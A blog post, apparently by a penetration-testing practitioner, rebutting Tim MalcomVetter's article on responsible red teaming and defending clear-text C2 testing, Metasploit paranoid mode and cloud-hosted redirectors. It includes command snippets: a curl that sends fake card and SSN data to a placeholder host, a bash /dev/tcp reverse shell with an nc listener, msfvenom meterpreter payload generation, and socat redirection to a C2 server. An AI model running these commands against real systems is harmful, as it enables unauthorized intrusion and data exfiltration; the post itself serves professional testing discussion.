Responsible Red Teams
Tim MalcomVetter

There was a very well-thought-out article on responsible red teaming by Tim MalcomVetter. However, I feel there are a number of issues with the conclusions and approaches that require a bit more nuance and discussion.

· Responsible red teams protect data. That means they use encrypted protocols for C2. And for exfiltration they encrypt the data, maybe just by downloading over an encrypted protocol, but at least by encrypting the data at the file level before sending it over an unencrypted protocol.

I agree with protecting customer data. However, this section is a bit oversimplified. Remember, the goal is not to “win” a red team engagement by getting C2. It is to identify the clipping levels of detective controls, and that does sometimes require sending some data unencrypted. For example, actual OS commands should be sent in clear text to test whether the IDS/IPS/firewall technologies can detect them. Further, a good tester should send some mock data (i.e., fake credit card numbers, SSNs, etc.) unencrypted as well to test DLP. Our goal is to test what is working and what is not.

As for customer-specific data, we have taught at SANS for years that customer data should not be pulled off a customer system if it can be avoided. For example, screenshots of “select count(*)” queries and planted flags should be enough. I would agree that pulling lots and lots of customer data off of a system would be a bad call. But there are other “responsible” ways to demonstrate access without jeopardizing a customer. I also feel that pulling more data than necessary is a bad call regardless of whether encryption is used or not.
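To make the DLP point concrete, here is a minimal sketch of the kind of mock-data test described above. Everything in it is illustrative: dlp-check.example.com stands in for a tester-controlled listener, and the card number and SSN are well-known dummy values, never real customer data.

    # Minimal DLP/egress check: send obviously fake PAN and SSN strings in clear
    # text over HTTP and watch whether the DLP/IDS stack alerts or blocks.
    # dlp-check.example.com is a placeholder for a tester-controlled listener.
    curl -s -X POST "http://dlp-check.example.com/exfil-test" \
         --data "cc=4111111111111111&ssn=078-05-1120&marker=REDTEAM-DLP-TEST"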

Responsible red teams also authenticate their C2 servers.* Regardless of the tools they drop, they ensure the callbacks out over the internet are reliably resilient and hardened against a random third party taking over their shells.

I base a lot of my perceptions of risk on what I have seen over the years. I have yet to see a pentester’s reverse connection taken over by a random third party. Is it possible? Sure, through DNS/ARP poisoning or possibly a BGP prefix attack. But if those attacks are happening, an organization has a lot more to worry about than a simple reverse connection a pentester forgot. I want to stress that the use of these attacks by some random party to steal a session is not likely; I have never seen it, or even heard of it. I feel comfortable enough in what I have seen and not seen to say that unauthenticated reverse connections are a pretty low risk. Now, leaving bind shells and implants open? Yes, that would be bad. Do not do that. Ever.

That means that responsible red teams don’t use netcat for forward or reverse shells. Knock that off. Maybe you need to use it once for an internal lateral movement between two highly controlled, non-mobile endpoints (two servers in a datacenter). Maybe. But that should be a last resort. Or do it only because of a specific blue team training objective. And make sure you have read-in a “trusted agent” from the blue team leadership to ensure it can be monitored and not abused in the process.

Again, this ties back to my first response. Very few organizations can detect clear-text C2. Yes, we need to test this. Yes, we have to show it is possible. That is our job as pentesters. However, I would agree with the statements about it being communicated and being a clear training objective. The customer needs to know what you are doing and why.
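As a hedged sketch of what that communicated training objective can look like in practice (the listener address 203.0.113.10 is a TEST-NET placeholder, and this assumes the customer and a blue-team trusted agent have already been read in):

    # Tester-side listener for a clear-text C2 detection test:
    nc -lvnp 4444

    # In-scope host: a classic unencrypted reverse shell, used only so the blue
    # team can verify their IDS/NSM stack actually sees plaintext command traffic.
    bash -i >& /dev/tcp/203.0.113.10/4444 0>&1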

That also means responsible red teams don’t use metasploit. Not even paranoid mode or metasploit pro. Sorry. I know this may be your favorite tool, but it doesn’t properly authenticate the server calling back out. I can hear your “but…” objections now. It’s for a short duration, or you’re very careful, etc. What happens when that artifact you drop in the target environment gets missed during cleanup and actually executes a year later? Who’s going to have meterpreter running at w.x.y.z then? Maybe nobody. Maybe somebody. It’s 2018, there are better options. (Maybe the metasploit team can add in actual server auth, but then again, metasploit was never really intended to be a C2 tool.)

This is not a statement that will win friends. This sounds like I am taking a dig at the author, but I am not. He has an opinion. It is not going to be popular. And I commend people with unpopular opinions. However, I disagree. There are a lot of maybes in the above section. Once again, it boils down to risk. I would argue there are very few situations where organizations were compromised because of Meterpreter reverse sessions sitting around. I would also argue that an artifact being left behind for a year after an engagement would be a problem whether it was Metasploit or not. But yes, paranoid mode with Meterpreter does fix this issue: it ties a Meterpreter payload to a specific handler and session. This should resolve the author’s concern. Tim owned up to this misunderstanding. We are cool. We all learned. Let’s move on.
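Before moving on, for readers who have not used it, this is roughly what paranoid mode looks like, based on Metasploit’s documented options (option names can vary by version; the certificate path, LHOST, and filenames here are placeholders):

    # Pin the payload to a specific handler TLS certificate so a stray artifact
    # cannot be staged or hijacked by an arbitrary listener.
    # ./example.pem is an assumed pre-generated unified key+cert PEM.
    msfvenom -p windows/meterpreter/reverse_https LHOST=203.0.113.10 LPORT=443 \
        HandlerSSLCert=./example.pem StagerVerifySSLCert=true -f exe -o payload.exe

    # Handler side in msfconsole:
    #   use exploit/multi/handler
    #   set PAYLOAD windows/meterpreter/reverse_https
    #   set LHOST 0.0.0.0
    #   set LPORT 443
    #   set HandlerSSLCert ./example.pem
    #   set StagerVerifySSLCert true
    #   run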

Responsible red teams don’t throw C2 servers all over virtual private cloud providers. Yes, it’s cool, your neat little red team automation script can deploy Empire and Cobalt Strike servers all over Digital Ocean, Linode, AWS, Azure, Google Cloud, with zero clicks … but why? There is a reason why the InfoSec community-as-a-whole churns every time we read about highly sensitive data running “on somebody else’s computer” (as the T-Shirt describes what “the cloud” really is). When you’re operating in your customer’s target environment, did you really think you wouldn’t access their most treasured secrets? Or are you just an insensitive jerk and don’t respect their data or their customers’ and employees’ data? How well did you clean up? Did you get a contract with that cloud provider stating they were going to protect your customers’ data? Did they sign on to be an extension of your customer’s PCI cardholder data environment?

This may seem like a good idea. If you do this work for a while as a consultant, you will learn better. True story: long ago, when I thought the exact same way as the above section, we had a redirector which pointed to our C2 infrastructure in South Dakota. What people who recommend the above approach do not understand is that the Internet is constantly being crawled: by government agencies, by Google, and by every other search engine out there. All it takes to shut down a whole C2 infrastructure is one of these crawlers hitting one of your phishing/C2 servers, registering it as malicious, and blacklisting it. Blacklists get shared very, very quickly. Then your C2 IP range is blacklisted. That will shut down operations. You will miss deadlines. Customers will not be happy.

This is not a perceived risk. This happened. Not just to BHIS, but to other firms as well.

And if this happens while using a cloud provider, we kill the image, spin up a new one, and get a new IP, all in moments. This is not driven by laziness. It is driven by practicality.
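As a rough sketch of how fast that burn-and-replace cycle is, using DigitalOcean’s doctl as one example (the droplet name, region, image, and SSH key ID are placeholders; any provider CLI or a Terraform module does the same job):

    # Burn and replace a blacklisted redirector in moments.
    doctl compute droplet delete redirector-01 --force
    doctl compute droplet create redirector-01 \
        --region nyc3 --image ubuntu-22-04-x64 --size s-1vcpu-1gb \
        --ssh-keys "$SSH_KEY_ID" --wait
    # New droplet, new public IP: repoint DNS and the operation keeps moving.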

I would also add this: the cloud is everywhere. I don’t much like it either. It is the outsourcing of the future. You cannot say we, as pentesters, cannot trust the cloud. We do. We all know it. I hate the argument that we cannot trust Digital Ocean, AWS, Azure, or Linode. You do. Every day, tons of sensitive data sits “on someone else’s computer.”

And here is a very easy way to look at it. Let’s say Google, Amazon, Azure, or Digital Ocean gets hacked. Let’s say they go rogue and start looking at data on servers. What is the news story going to be? That a penetration testing firm’s data was leaked? Or that a cloud provider was hacked?

Look, I hate the fact that all of us in IT use the cloud so much. But it is the future. In fact, it is the now.

Responsible red teams install their C2 servers in private data centers with all of the regular management overhead around them, and then deploy simple TCP redirectors at various parts of the internet to give the appearance of having this highly distributed infrastructure. And guess what … when you do that, your “cloud infrastructure” is typically just a couple lines of shell script (if that) per redirector host. If it gets “burned” and needs to move, it’s a 2 minute manual task — probably as fast as your infrastructure automation task. Faster if you automate that very simple 2 minute task.

This is a continuation of the previous section. If a core contention is that cloud providers cannot be trusted, then in this explanation (and in the follow-up article) the data is still flowing through a cloud provider. Yes, there is encryption and authentication, but the argument that cloud providers cannot be trusted falls apart the moment a cloud provider is used as a redirector.
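And to be concrete about what that redirector is: typically nothing more than a cheap cloud VM blindly forwarding traffic back to the real C2 server. A minimal sketch with socat (203.0.113.20 is a placeholder for the back-end C2 host; iptables DNAT or an SSH reverse tunnel work just as well):

    # Dumb TCP redirector on a throwaway cloud VM: everything hitting 443 here
    # is forwarded to the C2 server at 203.0.113.20. The customer's traffic
    # still transits this provider's box, encryption or not.
    socat TCP-LISTEN:443,fork,reuseaddr TCP:203.0.113.20:443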

I hear arguments about trust all the time. People say they cannot trust Metasploit/Kali/AWS/Gmail/Slack/GSA/Equifax/Snapchat/PokemonGo for whatever reason. While it sounds cool to be paranoid, it can quickly devolve into chest-thumping over who is the most paranoid.

If you are using a computer, you are trusting a lot of organizations. You trust DNS providers, CAs, OS vendors, programming language developers, ISPs, and, yes, cloud providers.

I would argue that using a virtual private cloud provider has made us more secure. We have direct control and visibility over all assets. We provision and decommission servers in a matter of seconds. Our IP addresses are not static. We have maximum flexibility with relays and firewalls. Patching and updates are far easier. In fact, almost all of the reasons organizations move to the cloud and adopt a DevOps approach are good reasons for a pentesting company to move to a VPC as well.

Now, it can be done wrong. You could have testers all spin their own accounts up. You could reuse the same instances for multiple tests. You could leave customer data where it is accessible to anyone on the Internet. But, if you think about it, the same mistakes can be made on a dedicated C2 infrastructure.

Please do not take this to mean I am angry at Tim. Not even close. Tim is one of the good ones. In fact, I called him before publishing this response. He just has a different perspective. He works at a Fortune 1 company. He has different requirements and restrictions than I do. I run a company that does hundreds of tests a year for many different customers. Trust me, this difference makes a difference. The approach we use works well for us. His approach works well for him. We can have disagreements without devolving into name calling.

And, at the end of the day, both Tim and I want things to get better. Conversations like this help us all get better.